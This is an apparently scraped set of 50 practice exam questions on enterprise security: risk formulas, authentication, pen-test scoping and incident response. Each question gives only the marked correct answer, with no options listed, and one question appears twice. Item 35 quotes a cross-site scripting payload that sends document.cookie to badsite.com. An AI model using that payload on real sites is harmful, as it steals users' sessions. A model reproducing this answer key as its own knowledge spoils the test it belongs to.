1.
Due to compliance regulations, a company requires a yearly penetration test. The Chief Information Security Officer (CISO) has asked that it be done under a black box methodology. Which of the following would be the advantage of conducting this kind of penetration test?
Correct Answer
D. The results should reflect what attackers may be able to learn about the company.
2.
A company has received the contract to begin developing a new suite of software tools to replace an aging collaboration solution. The original collaboration solution has been in place for nine years, contains over a million lines of code, and took over two years to develop originally. The SDLC has been broken up into eight primary stages, with each stage requiring an in-depth risk analysis before moving on to the next phase. Which of the following software development methods is MOST applicable?
Correct Answer
C. Waterfall model
3.
An information security assessor for an organization finished an assessment that identified critical issues with the human resource new employee management software application. The assessor submitted the report to senior management but nothing has happened. Which of the following would be a logical next step?
Correct Answer
C. Schedule a meeting with key human resource application stakeholders.
4.
The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day exploits. The CISO is concerned that an unrecognized threat could compromise corporate data and result in regulatory fines as well as poor corporate publicity. The network is mostly flat, with split staff/guest wireless functionality. Which of the following equipment MUST be deployed to guard against unknown threats?
Correct Answer
D. Behavior based IPS with a communication link to a cloud based vulnerability and threat feed
5.
ABC Corporation has introduced token-based authentication to system administrators due to the risk of password compromise. The tokens have a set of HMAC counter-based codes and are valid until they are used. Which of the following types of authentication mechanisms does this statement describe?
Correct Answer
D. HOTP
6.
A bank has decided to outsource some existing IT functions and systems to a third party service provider. The third party service provider will manage the outsourced systems on their own premises and will continue to directly interface with the bank's other systems through dedicated encrypted links. Which of the following is critical to ensure the successful management of system security concerns between the two organizations?
Correct Answer
A. ISA
7.
It has come to the IT administrator's attention that the "post your comment" field on the company blog page has been exploited, resulting in cross-site scripting attacks against customers reading the blog. Which of the following would be the MOST effective at preventing the "post your comment" field from being exploited?
Correct Answer
B. Filter metacharacters
8.
A security administrator has noticed that an increased number of employees' workstations are becoming infected with malware. The company deploys an enterprise antivirus system as well as a web content filter, which blocks access to malicious web sites where malware files can be downloaded. Additionally, the company implements technical measures to disable external storage. Which of the following is a technical control that the security administrator should implement next to reduce malware infection?
Correct Answer
D. Block cloud-based storage software on the company network
9.
The administrator is troubleshooting availability issues on an FCoE-based storage array that uses deduplication. The single controller in the storage array has failed, so the administrator wants to move the drives to a storage array from a different manufacturer in order to access the data. Which of the following issues may potentially occur?
Correct Answer
A. The data may not be in a usable format.
10.
The DLP solution has been showing some unidentified encrypted data being sent using FTP to a remote server. A vulnerability scan found a collection of Linux servers that are missing OS level patches. Upon further investigation, a technician notices that there are a few unidentified processes running on a number of the servers. What would be a key FIRST step for the data security team to undertake at this point?
Correct Answer
E. Conduct a bit level image, including RAM, of one or more of the Linux servers.
11.
A security manager has received the following email from the Chief Financial Officer (CFO): "While I am concerned about the security of the proprietary financial data in our ERP application, we have had a lot of turnover in the accounting group and I am having a difficult time meeting our monthly performance targets. As things currently stand, we do not allow employees to work from home but this is something I am willing to allow so we can get back on track. What should we do first to securely enable this capability for my group?" Based on the information provided, which of the following would be the MOST appropriate response to the CFO?
Correct Answer
D. Work with the executive management team to revise policies before allowing any remote access.
12.
Company ABC is hiring customer service representatives from Company XYZ. The representatives reside at Company XYZ's headquarters. Which of the following BEST prevents Company XYZ representatives from gaining access to unauthorized Company ABC systems?
Correct Answer
B. Require Company XYZ employees to establish an encrypted VDI session to the required systems
13.
A human resources manager at a software development company has been tasked with recruiting personnel for a new cyber defense division in the company. This division will require personnel to have high technology skills and industry certifications. Which of the following is the BEST method for this manager to gain insight into this industry to execute the task?
Correct Answer
D. Attend conferences, webinars, and training to remain current with the industry and job requirements
14.
The Chief Executive Officer (CEO) of a small start-up company wants to set up offices around the country for the sales staff to generate business. The company needs an effective communication solution to remain in constant contact with each other, while maintaining a secure business environment. A junior-level administrator suggests that the company and the sales staff stay connected via free social media. Which of the following decisions is BEST for the CEO to make?
Correct Answer
B. Social media is an ineffective solution because the policy may not align with the business.
15.
A security administrator is tasked with increasing the availability of the storage networks while enhancing the performance of existing applications. Which of the following technologies should the administrator implement to meet these goals? (Select TWO).
Correct Answer(s)
D. Dynamic disk pools
E. Multipath
16.
A company Chief Information Officer (CIO) is unsure which set of standards should govern the company's IT policy. The CIO has hired consultants to develop use cases to test against various government and industry security standards. The CIO is convinced that there is large overlap between the configuration checks and security controls governing each set of standards. Which of the following selections represent the BEST option for the CIO?
Correct Answer
C. Issue a policy specifying best practice security standards and a baseline to be implemented across the company.
17.
A penetration tester is assessing a mobile banking application. Man-in-the-middle attempts via a HTTP intercepting proxy are failing with SSL errors. Which of the following controls has likely been implemented by the developers?
Correct Answer
B. SSL certificate pinning
18.
The risk manager at a small bank wants to use quantitative analysis to determine the ALE of running a business system at a location which is subject to fires during the year. A risk analyst reports to the risk manager that the asset value of the business system is $120,000 and, based on industry data, the exposure factor to fires is only 20% due to the fire suppression system installed at the site. Fires occur in the area on average every four years. Which of the following is the ALE?
Correct Answer
A. $6,000
19.
An information security assessor for an organization finished an assessment that identified critical issues with the human resource new employee management software application. The assessor submitted the report to senior management but nothing has happened. Which of the following would be a logical next step?
Correct Answer
C. Schedule a meeting with key human resource application stakeholders.
20.
A system worth $100,000 has an exposure factor of eight percent and an ARO of four. Which of the following figures is the system's SLE?
Correct Answer
B. $8,000
21.
The helpdesk manager wants to find a solution that will enable the helpdesk staff to better serve company employees who call with computer-related problems. The helpdesk staff is currently unable to perform effective troubleshooting and relies on callers to describe their technology problems. Given that the helpdesk staff is located within the company headquarters and 90% of the callers are telecommuters, which of the following tools should the helpdesk manager use to make the staff more effective at troubleshooting while at the same time reducing company costs? (Select TWO).
Correct Answer(s)
C. Instant messaging
E. Desktop sharing
22.
An organization has implemented an Agile development process for front end web application development. A new security architect has just joined the company and wants to integrate security activities into the SDLC. Which of the following activities MUST be mandated to ensure code quality from a security perspective? (Select TWO).
Correct Answer(s)
A. Static and dynamic analysis is run as part of integration
D. For each major iteration penetration testing is performed
23.
An IT Manager is concerned about errors made during the deployment process for a new model of tablet. Which of the following would suggest best practices and configuration parameters that technicians could follow during the deployment process?
Correct Answer
D. Guideline
24.
The helpdesk department desires to roll out a remote support application for internal use on all company computers. This tool should allow remote desktop sharing, system log gathering, chat, hardware logging, inventory management, and remote registry access. The risk management team has been asked to review vendor responses to the RFQ. Which of the following questions is the MOST important?
Correct Answer
B. What accountability is built into the remote support application?
25.
An IT manager is concerned about the cost of implementing a web filtering solution in an effort to mitigate the risks associated with malware and resulting data leakage. Given that the ARO is twice per year, the ALE resulting from a data leak is $25,000 and the ALE after implementing the web filter is $15,000. The web filtering solution will cost the organization $10,000 per year. Which of the following values is the single loss expectancy of a data leakage event after implementing the web filtering solution?
Correct Answer
B. $7,500
26.
A company is trying to decide how to manage hosts in a branch location connected via a slow WAN link. The company desires to provide the same level of performance and functionality to the branch office as it provides to the main campus. The company uses Active Directory for its directory service and host configuration management. The branch location does not have a datacenter, and the physical security posture of the building is weak. Which of the following designs is MOST appropriate for this scenario?
Correct Answer
B. Deploy a corporate Read-Only Domain Controller to the branch location.
27.
The Information Security Officer (ISO) believes that the company has been targeted by cybercriminals and it is under a cyber attack. Internal services that are normally available to the public via the Internet are inaccessible, and employees in the office are unable to browse the Internet. The senior security engineer starts by reviewing the bandwidth at the border router, and notices that the incoming bandwidth on the router's external interface is maxed out. The security engineer then inspects the following piece of log to try and determine the reason for the downtime, focusing on the company's external router's IP which is 128.20.176.19:
11:16:22.110343 IP 90.237.31.27.19 > 128.20.176.19.19: UDP, length 1400
11:16:22.110351 IP 23.27.112.200.19 > 128.20.176.19.19: UDP, length 1400
11:16:22.110358 IP 192.200.132.213.19 > 128.20.176.19.19: UDP, length 1400
11:16:22.110402 IP 70.192.2.55.19 > 128.20.176.19.19: UDP, length 1400
11:16:22.110406 IP 112.201.7.39.19 > 128.20.176.19.19: UDP, length 1400
Which of the following describes the findings the senior security engineer should report to the ISO and the BEST solution for service restoration?
Correct Answer
A. After the senior engineer used a network analyzer to identify an active Fraggle attack, the company's ISP should be contacted and instructed to block the malicious packets.
28.
A multi-national company has a highly mobile workforce and minimal IT infrastructure. The company utilizes a BYOD and social media policy to integrate presence technology into global collaboration tools by individuals and teams. As a result of the dispersed employees and frequent international travel, the company is concerned about the safety of employees and their families when moving in and out of certain countries. Which of the following could the company view as a downside of using presence technology?
Correct Answer
C. Physical security
29.
The helpdesk is receiving multiple calls about slow and intermittent Internet access from the finance department. The following information is compiled:
Caller 1, IP 172.16.35.217, NETMASK 255.255.254.0
Caller 2, IP 172.16.35.53, NETMASK 255.255.254.0
Caller 3, IP 172.16.35.173, NETMASK 255.255.254.0
All callers are connected to the same switch and are routed by a router with five built-in interfaces. The upstream router interface's MAC is 00-01-42-32-ab-1a.
A packet capture shows the following:
09:05:15.934840 arp reply 172.16.34.1 is-at 00:01:42:32:ab:1a (00:01:42:32:ab:1a)
09:06:16.124850 arp reply 172.16.34.1 is-at 00:01:42:32:ab:1a (00:01:42:32:ab:1a)
09:07:25.439811 arp reply 172.16.34.1 is-at 00:01:42:32:ab:1a (00:01:42:32:ab:1a)
09:08:10.937590 IP 172.16.35.1 > 172.16.35.255: ICMP echo request, id 2305, seq 1, length 65534
09:08:10.937591 IP 172.16.35.1 > 172.16.35.255: ICMP echo request, id 2306, seq 2, length 65534
09:08:10.937592 IP 172.16.35.1 > 172.16.35.255: ICMP echo request, id 2307, seq 3, length 65534
Which of the following is occurring on the network?
Correct Answer
D. A denial of service attack is targeting the router.
30.
A security administrator is performing VDI traffic data collection on a virtual server which migrates from one host to another. While reviewing the data collected by the protocol analyzer, the security administrator notices that sensitive data is present in the packet capture. Which of the following should the security administrator recommend to ensure the confidentiality of sensitive information during live VM migration, while minimizing latency issues?
Correct Answer
A. A separate physical interface placed on a private VLAN should be configured for live host operations.
31.
After a security incident, an administrator would like to implement policies that would help reduce fraud and the potential for collusion between employees. Which of the following would help meet these goals by having co-workers occasionally audit another worker's position?
Correct Answer
B. Job rotation
32.
Which of the following activities is commonly deemed "OUT OF SCOPE" when undertaking a penetration test?
Correct Answer
C. Undertaking network-based denial of service attacks in production environment
33.
ABC Company must achieve compliance for PCI and SOX. Which of the following would BEST allow the organization to achieve compliance and ensure security? (Select THREE).
Correct Answer(s)
B. Establish a list of devices that must meet each regulation
D. Compartmentalize the network
F. Apply technical controls to meet compliance with the regulation
34.
A network administrator with a company's NSP has received a CERT alert for targeted adversarial behavior at the company. In addition to the company's physical security, which of the following can the network administrator use to detect the presence of a malicious actor physically accessing the company's network or information systems from within? (Select TWO).
Correct Answer(s)
D. HIDS
F. Protocol analyzer
35.
A security administrator notices the following line in a server's security log:
<input name='credentials' type=TEXT value="" + request.getParameter('><script>document.location='http://badsite.com/?q='document.cookie</script>') + '";
The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack?
Correct Answer
A. WAF
36.
A security auditor suspects two employees of having devised a scheme to steal money from the company. While one employee submits purchase orders for personal items, the other employee approves these purchase orders. The auditor has contacted the human resources director with suggestions on how to detect such illegal activities. Which of the following should the human resource director implement to identify the employees involved in these activities and reduce the risk of this activity occurring in the future?
Correct Answer
B. Job rotation
37.
An educational institution would like to make computer labs available to remote students. The labs are used for various IT networking, security, and programming courses. The requirements are:
1. Each lab must be on a separate network segment.
2. Labs must have access to the Internet, but not other lab networks.
3. Student devices must have network access, not simple access to hosts on the lab networks.
4. Students must have a private certificate installed before gaining access.
5. Servers must have a private certificate installed locally to provide assurance to the students.
6. All students must use the same VPN connection profile.
Which of the following components should be used to achieve the design in conjunction with directory services?
Correct Answer
C. IPSec VPN with mutual authentication for remote connectivity, RADIUS for authentication, ACLs on network equipment
38.
A security services company is scoping a proposal with a client. They want to perform a general security audit of their environment within a two week period and consequently have the following requirements:
Requirement 1: Ensure their server infrastructure operating systems are at their latest patch levels
Requirement 2: Test the behavior between the application and database
Requirement 3: Ensure that customer data can not be exfiltrated
Which of the following is the BEST solution to meet the above requirements?
Correct Answer
B. Perform dynamic code analysis, penetration test and run a vulnerability scanner
39.
A member of the software development team has requested advice from the security team to implement a new secure lab for testing malware. Which of the following is the NEXT step that the security team should take?
Correct Answer
D. Create a proposal and present it to management for approval.
40.
A security administrator is tasked with implementing two-factor authentication for the company VPN. The VPN is currently configured to authenticate VPN users against a backend RADIUS server. New company policies require a second factor of authentication, and the Information Security Officer has selected PKI as the second factor. Which of the following should the security administrator configure and implement on the VPN concentrator to implement the second factor and ensure that no error messages are displayed to the user during the VPN connection? (Select TWO).
Correct Answer(s)
E. The VPN concentrator's certificate private key must be installed on the VPN concentrator.
F. The CA's certificate public key must be installed on the VPN concentrator.
41.
A bank is in the process of developing a new mobile application. The mobile client renders content and communicates back to the company servers via REST/JSON calls. The bank wants to ensure that the communication is stateless between the mobile application and the web services gateway. Which of the following controls MUST be implemented to enable stateless communication?
Correct Answer
D. Authentication assertion should be stored securely on the client.
42.
A pentester must attempt to crack passwords on a Windows domain that enforces strong complex passwords. Which of the following would crack the MOST passwords in the shortest time period?
Correct Answer
B. Rainbow tables attack
43.
VPN users cannot access the active FTP server through the router but can access any server in the data center.
Additional network information:
DMZ network - 192.168.5.0/24 (FTP server is 192.168.5.11)
VPN network - 192.168.1.0/24
Datacenter - 192.168.2.0/24
User network - 192.168.3.0/24
HR network - 192.168.4.0/24
Traffic shaper configuration:
VLAN     Bandwidth Limit (Mbps)
VPN      50
User     175
HR       250
Finance  250
Guest    0
Router ACL:
Action  Source          Destination
Permit  192.168.1.0/24  192.168.2.0/24
Permit  192.168.1.0/24  192.168.3.0/24
Permit  192.168.1.0/24  192.168.5.0/24
Permit  192.168.2.0/24  192.168.1.0/24
Permit  192.168.3.0/24  192.168.1.0/24
Permit  192.168.5.1/32  192.168.1.0/24
Deny    192.168.4.0/24  192.168.1.0/24
Deny    192.168.1.0/24  192.168.4.0/24
Deny    any             any
Which of the following solutions would allow the users to access the active FTP server?
Correct Answer
A. Add a permit statement to allow traffic from 192.168.5.0/24 to the VPN network
44.
Ann, a systems engineer, is working to identify an unknown node on the corporate network. To begin her investigative work, she runs the following nmap command string:
user@hostname:~$ sudo nmap -O 192.168.1.54
Based on the output, nmap is unable to identify the OS running on the node, but the following ports are open on the device:
TCP/22
TCP/111
TCP/512-514
TCP/2049
TCP/32778
Based on this information, which of the following operating systems is MOST likely running on the unknown node?
Correct Answer
C. Solaris
45.
Executive management is asking for a new manufacturing control and workflow automation solution. This application will facilitate management of proprietary information and closely guarded corporate trade secrets.
The information security team has been a part of the department meetings and come away with the following notes:
- Human resources would like complete access to employee data stored in the application. They would like automated data interchange with the employee management application, a cloud-based SaaS application.
- Sales is asking for easy order tracking to facilitate feedback to customers.
- Legal is asking for adequate safeguards to protect trade secrets. They are also concerned with data ownership questions and legal jurisdiction.
- Manufacturing is asking for ease of use. Employees working the assembly line cannot be bothered with additional steps or overhead. System interaction needs to be quick and easy.
- Quality assurance is concerned about managing the end product and tracking overall performance of the product being produced. They would like read-only access to the entire workflow process for monitoring and baselining.
The favored solution is a user friendly software application that would be hosted onsite. It has extensive ACL functionality, but also has readily available APIs for extensibility. It supports read-only access, kiosk automation, custom fields, and data encryption.
Which of the following departments' request is in contrast to the favored solution?
Correct Answer
E. Human resources
46.
A company sales manager received a memo from the company's financial department which stated that the company would not be putting its software products through the same security testing as previous years to reduce the research and development cost by 20 percent for the upcoming year. The memo also stated that the marketing material and service level agreement for each product would remain unchanged. The sales manager has reviewed the sales goals for the upcoming year and identified an increased target across the software products that will be affected by the financial department's change. All software products will continue to go through new development in the coming year. Which of the following should the sales manager do to ensure the company stays out of trouble?
Correct Answer
B. Consult the company's legal department on practices and law
47.
A firm's Chief Executive Officer (CEO) is concerned that IT staff lacks the knowledge to identify complex vulnerabilities that may exist in a payment system being internally developed. The payment system being developed will be sold to a number of organizations and is in direct competition with another leading product. The CEO highlighted that code base confidentiality is of critical importance to allow the company to exceed the competition in terms of the product's reliability, stability, and performance. Which of the following would provide the MOST thorough testing and satisfy the CEO's requirements?
Correct Answer
C. Sign an NDA with a large security consulting firm and use the firm to perform Grey box testing and address all findings.
48.
Company XYZ provides hosting services for hundreds of companies across multiple industries including healthcare, education, and manufacturing. The security architect for company XYZ is reviewing a vendor proposal to reduce company XYZ's hardware costs by combining multiple physical hosts through the use of virtualization technologies. The security architect notes concerns about data separation, confidentiality, regulatory requirements concerning PII, and administrative complexity on the proposal. Which of the following BEST describes the core concerns of the security architect?
Correct Answer
C. Company XYZ could be liable for disclosure of sensitive data from one hosted customer when accessed by a malicious user who has gained access to the virtual machine of another hosted customer.
49.
An organization is selecting a SaaS provider to replace its legacy, in house Customer Resource Management (CRM) application. Which of the following ensures the organization mitigates the risk of managing separate user credentials?
Correct Answer
E. Ensure the SaaS provider supports directory services federation.
50.
The Information Security Officer (ISO) is reviewing a summary of the findings from the last COOP tabletop exercise. The Chief Information Officer (CIO) wants to determine which additional controls must be implemented to reduce the risk of an extended customer service outage due to the VoIP system being unavailable. Which of the following BEST describes the scenario presented and the document the ISO is reviewing?
Correct Answer
D. The ISO is assessing the effect of a simulated downtime involving the telecommunication system within the AAR.